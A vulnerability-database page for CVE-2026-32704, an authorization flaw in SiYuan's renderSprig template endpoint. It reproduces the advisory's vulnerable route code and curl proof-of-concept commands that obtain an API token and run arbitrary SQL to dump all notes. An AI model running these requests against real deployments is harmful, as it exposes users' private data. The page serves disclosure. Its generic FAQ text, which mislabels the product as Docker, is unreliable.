What is the CVSS score of CVE-2026-32704?

CVE-2026-32704 has a CVSS 3.1 base score of 6.5 (Medium). CVSS vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N. EPSS exploitation probability: 0.0%.

Which versions of Docker are affected by CVE-2026-32704?

CVE-2026-32704 presents notable security risk rated CVSS 6.5. Exploitation could compromise the security of affected deployments. Proof-of-concept code is publicly available.. A patch is available.

Is there a public PoC exploit available for CVE-2026-32704?

Yes, a public proof-of-concept exploit is available for CVE-2026-32704. Prioritise patching immediately. EPSS: 0.0%.

Docker CVE-2026-32704

EUVD-2026-12146 MEDIUM

Improper Authorization (CWE-285)

2026-03-13 https://github.com/siyuan-note/siyuan

GHSA-4j3x-hhg2-fm2x

Authentication Bypass Docker Suse

6.5

CVSS 3.1

CVSS VectorNVD

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N

Attack Vector

Network

Attack Complexity

Low

Privileges Required

Low

User Interaction

None

Scope

Unchanged

Confidentiality

High

Integrity

None

Availability

None

Lifecycle Timeline

Patch released

Mar 31, 2026 - 21:13 nvd

Patch available

PoC Detected

Mar 17, 2026 - 19:02 vuln.today

Public exploit code

EUVD ID Assigned

Mar 13, 2026 - 21:01 euvd

EUVD-2026-12146

Analysis Generated

Mar 13, 2026 - 21:01 vuln.today

CVE Published

Mar 13, 2026 - 20:56 nvd

MEDIUM 6.5

DescriptionNVD

Summary

POST /api/template/renderSprig lacks model.CheckAdminRole, allowing any authenticated user to execute arbitrary SQL queries against the SiYuan workspace database and exfiltrate all note content, metadata, and custom attributes.

Details

File: kernel/api/router.go

Every sensitive endpoint in the codebase uses model.CheckAuth + model.CheckAdminRole, but renderSprig only has CheckAuth:

//  Missing CheckAdminRole
ginServer.Handle("POST", "/api/template/renderSprig",
    model.CheckAuth, renderSprig)

//  Correct pattern used by all other data endpoints
ginServer.Handle("POST", "/api/template/render",
    model.CheckAuth, model.CheckAdminRole, model.CheckReadonly, renderTemplate)

renderSprig calls model.RenderGoTemplate (kernel/model/template.go) which registers SQL functions from kernel/sql/database.go:

(*templateFuncMap)["querySQL"] = func(stmt string) (ret []map[string]interface{}) {
    ret, _ = Query(stmt, 1024)  // executes raw SELECT, no role check
    return
}

Any authenticated user - including Publish Service Reader role accounts - can call this endpoint and execute arbitrary SELECT queries.

PoC

Environment:

bash

docker run -d --name siyuan -p 6806:6806 \
  -v $(pwd)/workspace:/siyuan/workspace \
  b3log/siyuan --workspace=/siyuan/workspace --accessAuthCode=test123

Exploit:

bash

# Step 1: Login and retrieve API token
curl -s -X POST http://localhost:6806/api/system/loginAuth \
  -H "Content-Type: application/json" \
  -d '{"authCode":"test123"}' -c /tmp/siy.cookie

sleep 15
# wait for boot

TOKEN=$(curl -s -X POST http://localhost:6806/api/system/getConf \
  -b /tmp/siy.cookie -H "Content-Type: application/json" -d '{}' \
  | python3 -c "import sys,json; print(json.load(sys.stdin)['data']['conf']['api']['token'])")
# Step 2: Execute SQL as non-admin user
curl -s -X POST http://localhost:6806/api/template/renderSprig \
  -H "Authorization: Token $TOKEN" \
  -H "Content-Type: application/json" \
  -d '{"template":"{{querySQL \"SELECT count(*) as n FROM blocks\" | toJson}}"}'

Confirmed response on v3.6.0:

json

{"code":0,"msg":"","data":"[{\"n\":0}]"}

Full note dump:

bash

curl -s -X POST http://localhost:6806/api/template/renderSprig \
  -H "Authorization: Token $TOKEN" \
  -H "Content-Type: application/json" \
  -d '{"template":"{{range $r := (querySQL \"SELECT hpath,content FROM blocks LIMIT 100\")}}{{$r.hpath}}: {{$r.content}}\n{{end}}"}'

Impact

Any authenticated user (API token holder, Publish Service Reader) can:

Dump all note content and document hierarchy from the workspace
Exfiltrate tags, custom attributes, block IDs, and timestamps
Search notes for stored passwords, API keys, or personal data
Enumerate all notebooks and their structure

This is especially severe in shared or enterprise deployments where lower-privilege accounts should not have access to other users' notes.

AnalysisAI

CVE-2026-32704 is a security vulnerability (CVSS 6.5). Risk factors: public PoC available.

RemediationAI

Within 30 days: Identify affected systems and apply vendor patches as part of regular patch cycle. Monitor vendor channels for patch availability.

Analysis

Detailed AI-generated intelligence summary covering attack vector, impact assessment, affected versions, remediation steps, and indicators of compromise.

POChttps://••••••••••.com/exploit

PATCHhttps://••••••••••.com/patch

ADVISORYhttps://••••••••••.com/advisory

Full analysis requires sign-in

Get intelligence summaries, risk assessment, exploit details, threat intel, and remediation guidance.

More from same product – last 7 days

CVE-2026-9256 HIGH This Week

8.1 May 22

Heap buffer overflow in NGINX Plus and NGINX Open Source ngx_http_rewrite_module allows unauthenticated remote attackers

Vendor StatusVendor

CVE-2026-32704 vulnerability details – vuln.today

Back

Docker CVE-2026-32704

CVSS VectorNVD

Lifecycle Timeline

DescriptionNVD

Summary

Details

PoC

Impact

AnalysisAI

RemediationAI

Full analysis requires sign-in

More from same product – last 7 days

Vendor StatusVendor

Share

External POC / Exploit Code